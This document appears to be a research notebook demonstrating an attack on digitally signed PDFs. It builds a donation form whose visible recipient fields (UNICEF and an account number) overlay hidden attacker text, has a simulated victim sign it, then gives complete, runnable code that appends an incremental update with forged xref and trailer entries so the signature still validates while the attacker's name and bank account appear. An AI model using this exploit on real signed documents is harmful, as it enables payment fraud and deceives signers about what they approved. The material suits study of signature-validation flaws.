# Step 0: Configuration Parameters Configration

In [ ]:
filename_unsigned    = "form_over_text.pdf"
filename_signed      = filename_unsigned.replace(".pdf", "-signed.pdf")
filename_manipulated = filename_signed.replace(".pdf", "-manipulated.pdf")
show_name            = "UNICEF"
show_account         = "123456789"
attacker_name        = "Attacker"
attacker_account     = "666666666"


# Step 1: Prepare the Document for the Victim

The following script produces a `filename_unsigned` that contains various forms.
We prepared a donation to `show_name` with `show_account`.

The forms are placed over text content `show_name` and `show_account`

In [ ]:
from reportlab.pdfgen import canvas
from reportlab.pdfbase import pdfform
from reportlab.lib.colors import black, white
from reportlab.pdfbase.acroform import AcroForm

c = canvas.Canvas(
    filename=filename_unsigned,
    pageCompression=False
)
form = AcroForm(c)
# Example based on:
# https://www.blog.pythonlibrary.org/2018/05/29/creating-interactive-pdf-forms-in-reportlab-with-python/
c.drawCentredString(300,700, "Donation Sender")
c.drawString(50, 650, 'Sender Name:')
form.textfield(name='sendername', y=645, value="Your Name", tooltip='Sender Name', x=220, width=300, height=20, textColor=black, borderColor=white, borderWidth=0, forceBorder=False)
c.drawString(50, 600, 'Sender Bank Account:')
form.textfield(name='senderaccount', y=595, value="Your Account", tooltip='Sender Bank Account', x=220, width=300, height=20, textColor=black, borderColor=white, borderWidth=0, forceBorder=False)
c.drawString(50, 550, 'Amount:')
form.textfield(name='amount', y=545, value="10 USD", tooltip='Amount', x=220, width=300, height=20, textColor=black, borderColor=white, borderWidth=0, forceBorder=False)
c.drawCentredString(300,500, "Donation Recipient")
c.drawString(50, 450, 'Recipient Name:')
c.drawString(225, 450, attacker_name)
form.textfield(name='recipientname', y=445, value=show_name, tooltip='Recipient Name', x=220, width=300, height=20, textColor=black, borderColor=white, borderWidth=0, forceBorder=False)
c.drawString(50, 400, 'Sender Bank Account:')
c.drawString(225, 400, attacker_account)
form.textfield(name='recipientaccount', y=395, value=show_account, tooltip='Sender Bank Account', x=220, width=300, height=20, textColor=black, borderColor=white, borderWidth=0, forceBorder=False)
c.save()
print(f"Successfully created {filename_unsigned}")

# Step 2: The Victim signs the document
We here simulate a victim who signs the document.

In [ ]:
import datetime
from cryptography.hazmat import backends
from cryptography.hazmat.primitives.serialization import pkcs12
from endesive.pdf import cms
date = datetime.datetime.utcnow() - datetime.timedelta(hours=12)
date = date.strftime("D:%Y%m%d%H%M%S+00'00'")
dct = {
    "aligned": 0,
    "sigflagsft": 132,
    "sigpage": 0,
    "sigbutton": True,
    "sigfield": "Signature1",
    "sigandcertify": False,
    "signaturebox": (350, 350, 520, 300),
    "signature": "(Signed) I ultimatively agree",
    "contact": "Signer",
    "location": "AoE",
    "signingdate": date,
    "reason": "No reason given",
    "password": "1234",
}
with open("../../../resources/pdf-signer/demo-rsa2048.p12", "rb") as fp:
    p12 = pkcs12.load_key_and_certificates(
        fp.read(), b"demo-rsa2048", backends.default_backend()
    )
data_unsigned = open(filename_unsigned, "rb").read()
data_signature = cms.sign(data_unsigned, dct, p12[0], p12[1], p12[2], "sha256")
with open(filename_signed, "wb") as fp:
    fp.write(data_unsigned)
    fp.write(data_signature)

print(f"Successfully created {filename_signed}")

# Step 3: Creating the Attack / Exploit

The attacker now manipulated the signed PDF.

Please note that the attack creates a new PDF that contains all originally signed data.

The attacker uses an Incremental Update to hide forms that hide the text `attacker_name` and `attacker_acccount` by copying the original form objects and replacing them with objects only holding an empty dictionary (`<< >>`).

In [ ]:
import sys
sys.path.append('../../../resources/lib/')
from pdfmanipulation import *
data_signed = bytearray(open(filename_signed, "rb").read())
# Detect form fields with overlays
overlays = getObjectByNeedle(data_signed,f"(?P<overlay>/AP\s+?<<.*?>>).*({show_name}|{show_account})")
updated_forms = list()

for match in overlays:
    # We create am object with identical objnr and gennr but holding an empty dictionary
    objnr = match.group("objnr")
    gennr = match.group("gennr")
    form_without_overlay = objnr + b" " + gennr + b" obj\n<< >>\nendobj"
    updated_forms.append(form_without_overlay)

# For the xref_update, we need to determine all byte offsets of the form fields
offset = len(data_signed)+1
offsets = list()
body_update = b""
for updated_form in updated_forms:
    offset += len(body_update)
    offsets.append(offset)
    body_update += b"\n" + updated_form

# Now we create a simply xref_update
xref_update = b"""
xref
0 1 
0000000000 65535 f 
"""
for (match,offset) in zip(overlays,offsets):
    objnr = match.group("objnr")
    gennr = int(match.group("gennr").decode())
    xref_update += objnr + b" 1 \n"
    xref_update += f"{offset:010} {gennr:05} n \n".encode()

# Now we create a simple trailer update
# Most values are simply copied from the previous trailer (which is the signed trailer)
previous_trailer = getTrailer(data_signed)[-1]
previous_startxref = getStartxref(data_signed)[-1].group("value").decode()
trailer_update = f"""
trailer
<<
/Size {previous_trailer.group("size").decode()}
/Root {previous_trailer.group("root").decode()}
/Info {previous_trailer.group("info").decode()}
/ID {previous_trailer.group("id").decode()}
/Prev {previous_startxref}
>>
startxref
{len(data_signed)+len(body_update)+1}
%%EOF
""".encode()

# Finally, we write the manipulated file.
# The signature remains valid, but the attacker content is shown
with open(filename_manipulated, "wb") as fp:
    fp.write(data_signed)
    fp.write(body_update)
    fp.write(xref_update)
    fp.write(trailer_update)

print(f"Successfully created {filename_manipulated}")